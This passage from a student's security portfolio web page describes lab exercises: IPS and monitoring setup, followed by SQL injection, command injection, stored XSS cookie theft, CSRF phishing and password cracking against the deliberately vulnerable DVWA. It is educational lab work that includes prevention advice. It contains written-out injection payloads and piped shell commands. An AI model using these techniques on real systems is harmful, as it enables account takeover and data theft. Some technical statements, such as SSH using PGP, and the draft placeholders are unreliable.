          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
